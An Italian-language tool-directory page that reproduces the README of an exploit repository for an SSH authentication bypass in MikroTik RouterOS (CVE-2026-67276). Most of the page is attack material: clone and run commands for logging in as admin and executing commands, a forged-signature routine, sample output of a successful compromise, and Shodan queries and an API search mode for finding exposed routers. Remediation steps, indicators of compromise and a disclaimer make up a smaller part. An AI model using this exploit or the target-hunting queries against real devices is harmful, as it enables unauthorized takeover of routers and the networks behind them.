Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/blackhatexploitation/exploit-mikrotik-2026
RicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza di RetePenetration TestingAutenticazione
GitHubblackhatexploitation/exploit-mikrotik-2026

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

exploit-mikrotik-2026

CVE-2026-67276 Exploit per il Bypass dell'Autenticazione SSH in MikroTik RouterOS

Vedi Repository
8h 16m faNon ancora revisionato
Condividi

CVE-2026-67276 - Exploit di Bypass dell'Autenticazione SSH MikroTrik

CVE Severity Type Platform

Bypass dell'Autenticazione a Chiave Pubblica SSH di MikroTik RouterOS - Nessuna Chiave Privata Richiesta

Una proof-of-concept per CVE-2026-67276 (MikroTrick), una vulnerabilità critica di bypass dell'autenticazione nell'implementazione SSH di MikroTik RouterOS che consente agli attaccanti di autenticarsi come qualsiasi utente senza possedere la loro chiave privata.


Indice

  • Panoramica della Vulnerabilità
  • Come Funziona
  • Versioni Interessate
  • Installazione
  • Utilizzo
  • Ricognizione con Shodan
  • Dettagli Tecnici
  • Rimedi
  • Riferimenti
  • Disclaimer

Panoramica della Vulnerabilità

La Catena di Attacco MikroTrick

CVE-2026-67276 fa parte di una più ampia catena di attacco denominata "MikroTrick" da CERT PL, che è stata osservata essere attivamente sfruttata in natura:


Come Funziona

La Vulnerabilità

L'autenticazione SSH di RouterOS presenta un difetto critico nel modo in cui valida le chiavi pubbliche:

  1. Bug di Corrispondenza delle Chiavi: RouterOS confronta il blob di chiave pubblica SSH presentato con le chiavi autorizzate utilizzando solo (tipo di chiave, modulo), omettendo completamente l'esponente
  2. Esponente dal Client: La verifica della firma utilizza l'esponente dal blob fornito dal client, non dalla chiave memorizzata
  3. Falsificazione Banale: Presentare {ssh-rsa, e=1, n=modulo_vittima} rende la verifica banale

Base Matematica

root@kitploit:~
Verifica RSA Standard:  sig^65537 mod n == atteso  (richiede chiave privata)
Verifica Sfruttata:     sig^1 mod n == sig           (NESSUNA chiave privata necessaria!)

Con esponente e=1, la verifica della firma diventa:

root@kitploit:~
sig^1 mod n == sig

Ciò significa che la "firma" è semplicemente il messaggio codificato EMSA-PKCS1-v1_5 stesso - costruibile da chiunque conosca il modulo pubblico della vittima.

Prerequisiti dell'Attacco

  1. Nome utente target di un account con una chiave RSA autorizzata
  2. Il modulo pubblico RSA n di quella chiave autorizzata (dal file .pub, connessioni precedenti, ecc.)
  3. Accesso di rete alla porta SSH

Versioni Interessate

RamoIntervallo VulnerabileVersione Corretta
6.x6.0 - 6.49.206.49.21+

Installazione

root@kitploit:~
# Clona il repository
git clone https://github.com/BlackHatExploitation/exploit-mikrotik-2026.git
cd exploit-mikrotik-2026

# Installa le dipendenze
pip install paramiko cryptography

Utilizzo

Avvio Rapido

root@kitploit:~
# Exploit di base - genera automaticamente la chiave, rileva la versione
python3 full_exploit.py --host 192.168.88.1 --username admin

# Esegui un comando dopo l'autenticazione
python3 full_exploit.py --host 192.168.88.1 --username admin --exec '/system resource print'

# Porta personalizzata
python3 full_exploit.py --host 192.168.88.1 --port 2222 --username admin

Utilizzo di una Chiave Pubblica Esistente

root@kitploit:~
# Se disponi del file di chiave pubblica della vittima
python3 full_exploit.py --host 192.168.88.1 --username admin --pubkey victim.pub

# Oppure fornisci direttamente il modulo
python3 full_exploit.py --host 192.168.88.1 --username admin --modulus-hex "00:ab:cd:..."

Rilevamento della Versione

L'exploit rileva automaticamente la versione di RouterOS e verifica lo stato della vulnerabilità:

root@kitploit:~
# Forza l'exploit anche su versioni non-MikroTik o sconosciute
python3 full_exploit.py --host 192.168.88.1 --username admin --skip-version-check

Tutte le Opzioni

root@kitploit:~
--host              IP/hostname RouterOS target (obbligatorio)
--port              Porta SSH (predefinita: 22)
--username          Nome utente RouterOS target (obbligatorio)
--pubkey            File di chiave pubblica RSA (auto-generata se non fornita)
--modulus-hex       Modulo RSA in esadecimale (alternativa a --pubkey)
--algos             Algoritmi di firma (predefiniti: ssh-rsa,rsa-sha2-256)
--exec              Comando da eseguire post-autenticazione
--exp-enc           Codifica dell'esponente: canonica (1 byte) o allineata (3 byte)
--timeout           Timeout di connessione (predefinito: 15.0 secondi)
--skip-version-check    Salta la verifica della versione RouterOS
--shodan-dorks      Stampa le query di ricerca Shodan
--shodan-search     Cerca target nell'API Shodan
--shodan-key        Chiave API Shodan
--shodan-query      Query Shodan personalizzata
--shodan-limit      Limite risultati Shodan (predefinito: 100)

Ricognizione con Shodan

Stampa Dorks

root@kitploit:~
python3 full_exploit.py --shodan-dorks

Ricerca nell'API Shodan

root@kitploit:~
# Ricerca di base
python3 full_exploit.py --shodan-search --shodan-key YOUR_API_KEY

# Query personalizzata
python3 full_exploit.py --shodan-search --shodan-key YOUR_KEY --shodan-query 'MikroTik port:22 country:US'

Query Shodan Utili


Dettagli Tecnici

Struttura del Blob di Chiave Pubblica SSH

root@kitploit:~
string    "ssh-rsa"
mpint     e (esponente pubblico)  <- L'attaccante fornisce e=1
mpint     n (modulo)          <- Modulo effettivo della vittima

Generazione della Firma Falsificata

root@kitploit:~
# La "firma" è semplicemente i dati di autenticazione codificati EMSA-PKCS1-v1_5
def forged_signature(data, sig_alg, n):
    k = (n.bit_length() + 7) // 8
    block = emsa_pkcs1_v15(data, sig_alg, k)
    return block  # Questa È la firma valida quando e=1

Note sul Formato Wire

  • La stringa del tipo interno del blob rimane ssh-rsa anche per gli algoritmi rsa-sha2-256/512
  • L'algoritmo di firma va solo nel campo algoritmo esterno
  • Sia la codifica canonica (1 byte) che quella allineata (3 byte) di e=1 funzionano sulle versioni vulnerabili

Esempio di Output

root@kitploit:~
[*] Exploit CVE-2026-67276 MikroTrick
[*] Target: 192.168.88.1:22

[*] Rilevamento versione RouterOS...
[*] Banner SSH: SSH-2.0-ROSSSH-7.23.3
[*] Versione RouterOS: 7.23.3
[+] VERSIONE VULNERABILE - CVE-2026-67276 applicabile

[*] Generazione coppia di chiavi RSA a 2048 bit...
[+] Chiave privata salvata: /path/to/exploit_key
[+] Chiave pubblica salvata:  /path/to/exploit_key.pub
[*] Modulo: 2048-bit | e=1 falsificato
[*] Codifica esponente: canonica (01)

[*] Tentativo rsa-sha2-256 ...
[+] AUTENTICATO come 'admin' tramite rsa-sha2-256
[+] CVE-2026-67276 CONFERMATO - il target è vulnerabile
--- output del comando ---
                uptime: 14d23h45m12s
               version: 7.23.3 (stable)
            build-time: Sep/01/2026 12:00:00

Rimedi

1. Aggiorna Immediatamente

root@kitploit:~
# Controlla la versione corrente
/system resource print

# Aggiorna alla versione corretta
/system package update download
/system reboot

Versioni Minime Sicure:

  • Ramo 6.x: 6.49.21
  • 7.x stabile: 7.23.4
  • 7.x testing: 7.24.2

2. Disabilita SSH se Non Necessario

root@kitploit:~
/ip service disable ssh

3. Limita l'Accesso SSH

root@kitploit:~
# Per indirizzo IP
/ip service set ssh address=192.168.88.0/24

# Regola firewall
/ip firewall filter add chain=input dst-port=22 protocol=tcp \
    src-address=!192.168.88.0/24 action=drop

4. Verifica Eventuali Compromissioni

root@kitploit:~
# Controlla utenti sospetti
/user print

# Controlla l'utente "ops" (indicatore noto di attaccante)
/user print where name=ops

# Controlla lo stato di flag del dispositivo
/system/device-mode/print

# Controlla i log
/log print where topics~"ssh"

IOC Noti:

  • Voci di log: login failure for user -2 via ssh
  • Utente privilegiato sconosciuto ops
  • Marcatore "Flagged" del dispositivo
  • IP degli attaccanti: 82.192.72.4, 103.102.31.18

Riferimenti

  • Advisory CERT PL
  • Dettagli CVE CERT PL
  • Bollettino di Sicurezza MikroTik
  • RFC 8017 - PKCS#1 v2.2
  • RFC 8332 - Uso di Chiavi RSA con SHA-256/512 in SSH
  • RFC 4252 - Protocollo di Autenticazione SSH

Disclaimer

⚠️ Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi.

  • Utilizzalo solo contro sistemi di cui sei proprietario o per cui hai esplicita autorizzazione scritta a testare
  • L'accesso non autorizzato a sistemi informatici è illegale ai sensi del CFAA, del Computer Misuse Act e di leggi simili in tutto il mondo
  • Gli autori non sono responsabili di qualsiasi uso improprio o danno causato da questo strumento
  • Utilizzando questo strumento, accetti di usarlo in modo responsabile e legale

Licenza

Licenza MIT - Vedi LICENSE per i dettagli.


Autore

PoC di Ricerca sulla Sicurezza - Implementazione di Laboratorio CVE-2026-67276

Metti una stella a questo repo se lo trovi utile!

Scarica lo strumento
DettaglioInformazione
ID CVECVE-2026-67276
GravitàCritica (CVSS 9.8)
CWECWE-347 (Verifica Impropria della Firma Crittografica)
Vettore di AttaccoRete
AutenticazioneNessuna
ComplessitàBassa
ImpattoCompromissione completa del dispositivo
CVETipoDescrizione
CVE-2026-67276Bypass AuthBypass dell'autenticazione a chiave pubblica SSH tramite falsificazione dell'esponente
CVE-2026-86060Escalation PrivilegiIniezione di argomenti tramite nome utente
CVE-2026-67279Bypass AuthConnessione SSH senza userauth completato
CVE-2026-67277Divulgazione InfoPerdita di memoria del kernel tramite bandwidth-test
CVE-2026-67278Bypass FirmaAccettazione di firme X.509 malformate
CVE-2026-67281Lettura FileLettura file di root WebFig tramite jsproxy
7.x stabile
7.0 - 7.23.3
7.23.4+
7.x testing7.24.0 - 7.24.17.24.2+
TargetQuery
Tutti i MikroTikMikroTik
MikroTik SSHMikroTik port:22
Winbox Espostoport:8291
Pannello WebFighttp.title:RouterOS
RouterOS 6.49.xMikroTik "6.49"
RouterOS 7.xMikroTik "RouterOS v7"
Per PaeseMikroTik country:US
Indizio di VulnerabilitàMikroTik ("6.49" OR "7.23" OR "7.24.0")